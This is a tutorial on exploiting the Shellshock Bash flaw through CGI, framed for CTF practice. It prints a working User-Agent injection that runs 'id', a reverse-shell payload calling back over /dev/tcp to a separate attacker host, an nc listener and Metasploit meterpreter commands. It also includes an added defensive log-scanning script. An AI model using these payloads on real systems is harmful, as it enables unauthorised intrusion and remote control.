Shellshock, a vulnerability that allows attackers to execute arbitrary code remotely through the Unix Bash shell, was one of the most serious flaws discovered in the past decade.
Shellshock remains a serious hazard, particularly for unpatched systems. It affects the majority of Linux and UNIX-based operating systems. The vulnerability now appears in many CTF challenges, so this article may help you find a technique to attack it.
What is the Mechanism of this Vulnerability?
It is a security flaw in the Unix Bash shell that causes Bash to mistakenly execute commands taken from environment variables. The flaw is caused by Bash erroneously executing trailing instructions when importing a function definition contained in an environment variable: anything placed after the closing brace of the definition is run as a command. If an attacker can modify the environment variable list, he or she may run arbitrary commands on the system or exploit other flaws in Bash's command interpreter.
To test the vulnerability, we make a curl request to the target system and verify that the response contains the output of the "id" command for the current user.
root@kali:~# curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://192.168.175.10/cgi-bin/cgi-file.cgi
uid=33(www-data) gid=33(www-data) groups=33(www-data)
This trick works! We successfully changed the environment variable and ran the "id" command. We may open a reverse shell using the same method.
root@kali:~# curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.175.20/9000 0>&1' http://192.168.175.10/cgi-bin/cgi-file.cgi
Of course, you need a listener waiting on the port used in the payload, in this case 9000.
nc -lvnp 9000
On the remote system, the User-Agent value sent by curl is stored by the CGI handler as an environment variable. By default curl sets it to HTTP_USER_AGENT=curl/7.47.0, but the client may set this value to anything, so the environment variable can be made to contain malicious code that creates a reverse shell.
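As a defender's complement to the requests above, here is an added example (not part of the original article) that scans Apache combined-format access log lines for the "() {" function-definition prefix that every Shellshock payload must carry in a client-controlled header. The log lines, timestamps and addresses are constructed from the article's own requests.

```python
import re

# Marker of a Shellshock-style payload: an empty function definition "() {" that
# Bash recognised when importing functions from environment variables. Whitespace
# between the tokens is tolerated because probes vary it ("() {", "(){", "( ) {").
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache "combined" log format (constructed regex; adjust if your LogFormat differs).
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def is_shellshock_probe(value: str) -> bool:
    """True if a header or request value carries the '() {' function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None

def scan_access_log(lines):
    """Return (client, request, field) for every line that looks like a Shellshock attempt.

    Every client-controlled value that a CGI handler copies into the environment is
    checked: User-Agent (HTTP_USER_AGENT), Referer (HTTP_REFERER) and the request line.
    """
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not in combined format; a real deployment would log and skip it
        for field in ("agent", "referer", "request"):
            if is_shellshock_probe(m.group(field)):
                hits.append((m.group("client"), m.group("request"), field))
                break  # one alert per log line is enough
    return hits

# Constructed sample log: the two probes from the article plus two benign requests.
SAMPLE_LOG = [
    '192.168.175.20 - - [24/Sep/2014:10:00:01 +0000] "GET /cgi-bin/cgi-file.cgi HTTP/1.1" 200 54 "-" '
    '"() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id"',
    '192.168.175.20 - - [24/Sep/2014:10:00:05 +0000] "GET /cgi-bin/cgi-file.cgi HTTP/1.1" 200 0 "-" '
    '"() { :; }; /bin/bash -i >& /dev/tcp/192.168.175.20/9000 0>&1"',
    '10.0.0.5 - - [24/Sep/2014:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.47.0"',
    # Parentheses in a normal browser UA do not match: the pattern needs "()" followed by "{".
    '10.0.0.6 - - [24/Sep/2014:10:02:00 +0000] "GET /cgi-bin/cgi-file.cgi HTTP/1.1" 200 54 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64; rv:32.0) Gecko/20100101 Firefox/32.0"',
]

if __name__ == "__main__":
    for client, request, field in scan_access_log(SAMPLE_LOG):
        print(f"ALERT shellshock probe from {client} in {field}: {request}")
```

A hit in the log only shows that a probe arrived; whether it succeeded depends on the Bash version behind the CGI handler, which is the thing to patch.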
Metasploit-based exploitation
Metasploit may likewise be used to accomplish the same aim. Using the search function, we can quickly find exploits. Numerous modules match, but the one we want is the Apache mod_cgi module, apache_mod_cgi_bash_env_exec. Here are the Metasploit commands:
msf6 > search shellshock
msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOST 192.168.175.10
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/shellshock.cgi
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run